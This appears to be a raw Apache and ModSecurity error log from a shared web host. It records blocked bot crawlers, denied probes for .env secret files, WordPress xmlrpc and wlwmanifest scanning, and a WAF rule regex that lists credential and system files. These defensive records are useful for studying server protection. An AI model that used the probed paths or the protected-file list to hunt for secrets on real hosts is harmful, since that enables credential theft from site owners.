[Tue May 26 16:31:10.550312 2026] [security2:error] [pid 808625:tid 808767] [client 204.15.208.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahV9djEl_SBaWibfDmpMUgAAAAw"]
[Tue May 26 16:31:10.560174 2026] [security2:error] [pid 808625:tid 808816] [client 204.15.208.43:48920] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahV9djEl_SBaWibfDmpMRwAAAD0"]
[Tue May 26 16:31:10.572320 2026] [security2:error] [pid 808625:tid 808877] [client 114.119.139.115:52155] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV9djEl_SBaWibfDmpMUwAAAHo"], referer: http://glorodavionics.com/beta/index.php?route=product%2Fcategory&path=72_79
[Tue May 26 16:31:10.738263 2026] [authz_core:error] [pid 808625:tid 808844] [client 176.65.139.237:48870] AH01630: client denied by server configuration: /home2/azurm42s/public_html/erp/htdocs/.env
[Tue May 26 16:31:11.218694 2026] [security2:error] [pid 808625:tid 808786] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9djEl_SBaWibfDmpMVgAAAB8"]
[Tue May 26 16:31:13.925083 2026] [security2:error] [pid 808625:tid 808842] [client 107.150.120.129:12611] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "cpanel.koneksi.com.co"] [uri "/"] [unique_id "ahV9eTEl_SBaWibfDmpMlgAAAFc"]
[Tue May 26 16:31:15.124868 2026] [security2:error] [pid 808625:tid 808733] [remote 74.7.241.58:56562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV9ezEl_SBaWibfDmpMswAASWs"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes/interactivity-api
[Tue May 26 16:31:15.661789 2026] [security2:error] [pid 808625:tid 808819] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9ejEl_SBaWibfDmpMrQAAAEA"]
[Tue May 26 16:31:16.706556 2026] [security2:error] [pid 808625:tid 808781] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9ezEl_SBaWibfDmpMtwAAABo"]
[Tue May 26 16:31:17.339728 2026] [security2:error] [pid 808625:tid 808755] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9fDEl_SBaWibfDmpMzQAAAAA"]
[Tue May 26 16:31:19.188087 2026] [security2:error] [pid 808625:tid 808879] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9fjEl_SBaWibfDmpM_gAAAHw"]
[Tue May 26 16:31:20.961269 2026] [security2:error] [pid 808625:tid 808850] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9gDEl_SBaWibfDmpNHQAAAF8"]
[Tue May 26 16:31:23.701328 2026] [security2:error] [pid 808625:tid 808865] [client 114.119.156.86:29769] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.athelstan.org.in"] [uri "/athelstan-about-overview.php"] [unique_id "ahV9gzEl_SBaWibfDmpNYQAAAG4"], referer: https://www.athelstan.org.in/athelstan-about-history.php
[Tue May 26 16:31:24.477700 2026] [security2:error] [pid 808625:tid 808882] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9gzEl_SBaWibfDmpNTwAAAH8"]
[Tue May 26 16:31:24.872228 2026] [security2:error] [pid 808625:tid 808787] [client 14.191.252.210:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9gzEl_SBaWibfDmpNWAAAACA"]
[Tue May 26 16:31:26.323093 2026] [security2:error] [pid 808625:tid 808839] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9hDEl_SBaWibfDmpNcwAAAFQ"]
[Tue May 26 16:31:26.563563 2026] [security2:error] [pid 808625:tid 808814] [client 176.65.139.234:31436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "madrasbarassociation.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahV9hjEl_SBaWibfDmpNjAAAADs"]
[Tue May 26 16:31:27.433705 2026] [security2:error] [pid 808625:tid 808760] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9hjEl_SBaWibfDmpNjQAAAAU"]
[Tue May 26 16:31:29.058937 2026] [security2:error] [pid 808625:tid 808780] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9iDEl_SBaWibfDmpNsAAAABk"]
[Tue May 26 16:31:31.651279 2026] [security2:error] [pid 808625:tid 808767] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9ijEl_SBaWibfDmpN4QAAAAw"]
[Tue May 26 16:31:33.501851 2026] [security2:error] [pid 808625:tid 808849] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9jTEl_SBaWibfDmpODAAAAF4"]
[Tue May 26 16:31:34.836591 2026] [security2:error] [pid 808625:tid 808758] [client 157.90.155.240:63814] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahV9jjEl_SBaWibfDmpOPAAAAAM"], referer: https://thegoodsporting.com
[Tue May 26 16:31:35.330111 2026] [security2:error] [pid 808625:tid 808848] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9jjEl_SBaWibfDmpOLwAAAF0"]
[Tue May 26 16:31:35.550289 2026] [security2:error] [pid 808625:tid 808764] [client 85.208.96.208:22212] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahV9jzEl_SBaWibfDmpOSgAAAAk"]
[Tue May 26 16:31:35.550525 2026] [security2:error] [pid 808625:tid 808764] [client 85.208.96.208:22212] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahV9jzEl_SBaWibfDmpOSgAAAAk"]
[Tue May 26 16:31:36.608558 2026] [security2:error] [pid 808625:tid 808806] [client 198.244.242.148:31604] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.bosscoirs.com"] [uri "/robots.txt"] [unique_id "ahV9kDEl_SBaWibfDmpOXwAAADM"]
[Tue May 26 16:31:36.608682 2026] [security2:error] [pid 808625:tid 808806] [client 198.244.242.148:31604] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.bosscoirs.com"] [uri "/robots.txt"] [unique_id "ahV9kDEl_SBaWibfDmpOXwAAADM"]
[Tue May 26 16:31:37.121417 2026] [core:crit] [pid 808625:tid 808837] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:31:37.472529 2026] [security2:error] [pid 808625:tid 808804] [client 43.172.194.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahV9kTEl_SBaWibfDmpOcgAAADE"]
[Tue May 26 16:31:37.765785 2026] [security2:error] [pid 808625:tid 808759] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9kTEl_SBaWibfDmpOZQAAAAQ"]
[Tue May 26 16:31:38.011059 2026] [security2:error] [pid 808625:tid 808764] [client 54.39.0.78:46422] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.bosscoirs.com"] [uri "/"] [unique_id "ahV9kjEl_SBaWibfDmpOfAAAAAk"]
[Tue May 26 16:31:38.011186 2026] [security2:error] [pid 808625:tid 808764] [client 54.39.0.78:46422] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.bosscoirs.com"] [uri "/"] [unique_id "ahV9kjEl_SBaWibfDmpOfAAAAAk"]
[Tue May 26 16:31:39.553159 2026] [security2:error] [pid 808625:tid 808810] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9kzEl_SBaWibfDmpOmwAAADc"]
[Tue May 26 16:31:41.483090 2026] [security2:error] [pid 808625:tid 808771] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9lDEl_SBaWibfDmpO0AAAABA"]
[Tue May 26 16:31:41.683233 2026] [security2:error] [pid 808625:tid 808812] [client 172.86.66.156:56057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.66.86.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV9lTEl_SBaWibfDmpO4wAAADk"], referer: https://www.cagmedya.com/
[Tue May 26 16:31:41.683493 2026] [security2:error] [pid 808625:tid 808812] [client 172.86.66.156:56057] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV9lTEl_SBaWibfDmpO4wAAADk"], referer: https://www.cagmedya.com/
[Tue May 26 16:31:42.848948 2026] [fcgid:warn] [pid 808625:tid 808775] (70014)End of file found: [client 185.242.226.110:54131] mod_fcgid: can't get data from http client
[Tue May 26 16:31:43.688939 2026] [security2:error] [pid 808625:tid 808839] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9lzEl_SBaWibfDmpPAgAAAFQ"]
[Tue May 26 16:31:44.006720 2026] [security2:error] [pid 808625:tid 808850] [client 80.225.239.126:35700] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.stvica.jhonweb.com"] [uri "/"] [unique_id "ahV9mDEl_SBaWibfDmpPGgAAAF8"]
[Tue May 26 16:31:44.485361 2026] [security2:error] [pid 808625:tid 808790] [client 14.191.103.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahV9lzEl_SBaWibfDmpO_wAAACM"]
[Tue May 26 16:31:45.155336 2026] [security2:error] [pid 808625:tid 808872] [client 5.35.37.26:52871] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "5.35.37.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahV9mTEl_SBaWibfDmpPLgAAAHU"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 16:31:45.155446 2026] [security2:error] [pid 808625:tid 808872] [client 5.35.37.26:52871] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahV9mTEl_SBaWibfDmpPLgAAAHU"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 16:31:45.253913 2026] [security2:error] [pid 808625:tid 808826] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9mDEl_SBaWibfDmpPLQAAAEc"]
[Tue May 26 16:31:45.733283 2026] [proxy:error] [pid 808625:tid 808779] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:31:45.733338 2026] [proxy_http:error] [pid 808625:tid 808779] [client 2.58.56.163:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:31:45.733985 2026] [proxy:error] [pid 808625:tid 808779] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:31:45.734029 2026] [proxy_http:error] [pid 808625:tid 808779] [client 2.58.56.163:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:31:45.749372 2026] [security2:error] [pid 808625:tid 808806] [client 5.35.37.26:52894] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "5.35.37.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahV9mTEl_SBaWibfDmpPQgAAADM"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 16:31:45.749455 2026] [security2:error] [pid 808625:tid 808806] [client 5.35.37.26:52894] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahV9mTEl_SBaWibfDmpPQgAAADM"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 16:31:46.077850 2026] [proxy:error] [pid 808625:tid 808771] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:31:46.077928 2026] [proxy_http:error] [pid 808625:tid 808771] [client 2.58.56.163:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:31:46.078522 2026] [proxy:error] [pid 808625:tid 808771] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:31:46.078570 2026] [proxy_http:error] [pid 808625:tid 808771] [client 2.58.56.163:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:31:46.382609 2026] [security2:error] [pid 808625:tid 808850] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahV9mjEl_SBaWibfDmpPSwAAAF8"]
[Tue May 26 16:31:46.895572 2026] [security2:error] [pid 808625:tid 808876] [client 2.58.56.163:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.56.58.2.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcontacts.ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV9mjEl_SBaWibfDmpPVQAAAHk"]
[Tue May 26 16:31:47.203712 2026] [proxy:error] [pid 808625:tid 808780] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:31:47.203799 2026] [proxy_http:error] [pid 808625:tid 808780] [client 2.58.56.163:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:31:47.204733 2026] [proxy:error] [pid 808625:tid 808780] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:31:47.204784 2026] [proxy_http:error] [pid 808625:tid 808780] [client 2.58.56.163:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:31:47.470860 2026] [security2:error] [pid 808625:tid 808842] [client 185.255.126.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV9mzEl_SBaWibfDmpPZQAAAFc"], referer: http://yourstorybag.com/blog/
[Tue May 26 16:31:47.496843 2026] [security2:error] [pid 808625:tid 808790] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9mjEl_SBaWibfDmpPWwAAACM"]
[Tue May 26 16:31:47.674139 2026] [security2:error] [pid 808625:tid 808865] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahV9mzEl_SBaWibfDmpPaAAAAG4"]
[Tue May 26 16:31:47.977825 2026] [security2:error] [pid 808625:tid 808762] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahV9mzEl_SBaWibfDmpPbQAAAAc"]
[Tue May 26 16:31:48.355907 2026] [security2:error] [pid 808625:tid 808879] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahV9nDEl_SBaWibfDmpPdwAAAHw"]
[Tue May 26 16:31:48.658884 2026] [security2:error] [pid 808625:tid 808810] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahV9nDEl_SBaWibfDmpPewAAADc"]
[Tue May 26 16:31:48.963404 2026] [security2:error] [pid 808625:tid 808765] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahV9nDEl_SBaWibfDmpPggAAAAo"]
[Tue May 26 16:31:49.275460 2026] [security2:error] [pid 808625:tid 808770] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahV9nTEl_SBaWibfDmpPjAAAAA8"]
[Tue May 26 16:31:49.549571 2026] [security2:error] [pid 808625:tid 808862] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV9nTEl_SBaWibfDmpPiAAAAGs"]
[Tue May 26 16:31:49.615367 2026] [security2:error] [pid 808625:tid 808824] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahV9nTEl_SBaWibfDmpPkwAAAEU"]
[Tue May 26 16:31:49.922132 2026] [security2:error] [pid 808625:tid 808880] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahV9nTEl_SBaWibfDmpPmgAAAH0"]
[Tue May 26 16:31:50.259449 2026] [security2:error] [pid 808625:tid 808848] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cpcontacts.ndequipments.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahV9njEl_SBaWibfDmpPngAAAF0"]
